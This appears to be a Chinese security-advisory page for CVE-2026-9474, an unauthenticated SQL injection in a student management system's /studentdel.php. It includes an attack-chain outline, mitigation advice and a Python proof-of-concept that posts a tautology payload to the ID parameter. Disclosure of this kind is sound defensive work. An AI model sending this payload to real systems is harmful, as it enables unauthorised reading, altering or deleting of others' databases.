CVE-2026-9474 CVSS 7.3 高危

CVE-2026-9474 StudentManagementSystem SQL注入漏洞

披露日期: 2026-05-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9474

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

yashpokharna2555 StudentManagementSystem

漏洞概述

yashpokharna2555 StudentManagementSystem的/studentdel.php文件中存在SQL注入漏洞。攻击者可远程操纵confirm_logged_in函数的ID参数，无需认证即可注入恶意SQL语句，可能导致数据库信息泄露、篡改或破坏。

技术细节

该漏洞源于yashpokharna2555 StudentManagementSystem在处理用户输入时缺乏有效的安全过滤。具体问题出现在/studentdel.php文件的confirm_logged_in函数中，该函数直接将用户通过HTTP请求提交的ID参数拼接到SQL查询语句中，未使用参数化查询或进行转义处理。由于该产品采用滚动发布模式，受影响版本包括提交哈希cb2f558ddf8d19396de0f92abf2d224d46a0a203之前的所有版本。攻击者可通过发送特制的POST请求，利用该漏洞执行任意SQL命令，从而绕过身份验证、窃取敏感数据或删除数据库记录。目前项目方尚未对此漏洞做出响应。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行的是yashpokharna2555 StudentManagementSystem系统。

STEP 2

武器化

攻击者构造针对/studentdel.php接口ID参数的恶意SQL注入Payload。

STEP 3

交付

攻击者向目标服务器发送包含恶意Payload的HTTP POST请求。

STEP 4

利用

服务器后端confirm_logged_in函数处理请求时，将恶意参数拼接到SQL语句中并执行。

STEP 5

影响

数据库执行非预期命令，导致数据泄露（C:L）、数据篡改（I:L）或服务受影响（A:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli_vulnerability(target_url):
    """
    Proof of Concept for CVE-2026-9474
    This script tests the SQL injection vulnerability in the ID parameter.
    """
    # Target endpoint based on the vulnerability description
    full_url = f"{target_url}/studentdel.php"
    
    # Payload to test SQL injection (e.g., logical OR condition)
    # This attempts to make the SQL query always return true
    payload = {
        "ID": "1' OR '1'='1"
    }
    
    try:
        print(f"[+] Sending payload to {full_url}...")
        response = requests.post(full_url, data=payload, timeout=10)
        
        # Check if the response indicates successful SQL execution or database error
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[!] Check the response body for database errors or unexpected data leakage.")
            print(f"Response snippet: {response.text[:200]}")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost"
    check_sqli_vulnerability(target)

影响范围

yashpokharna2555 StudentManagementSystem <= commit cb2f558ddf8d19396de0f92abf2d224d46a0a203

防御指南

临时缓解措施

建议开发者立即审查并修改/studentdel.php文件源代码，确保ID参数在进入数据库查询前经过严格的过滤和验证。在官方修复发布前，可部署Web应用防火墙（WAF）并配置规则以拦截针对该参数的常见SQL注入攻击模式，从而降低被利用的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9474
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9474
3 Details https://www.cvedetails.com/cve/CVE-2026-9474/
4 VulDB https://vuldb.com/cve/CVE-2026-9474
5 Link https://github.com/yashpokharna2555/StudentManagementSystem/
6 Link https://github.com/yashpokharna2555/StudentManagementSystem/issues/5
7 Link https://vuldb.com/submit/814004
8 Link https://vuldb.com/vuln/365455
9 Link https://vuldb.com/vuln/365455/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表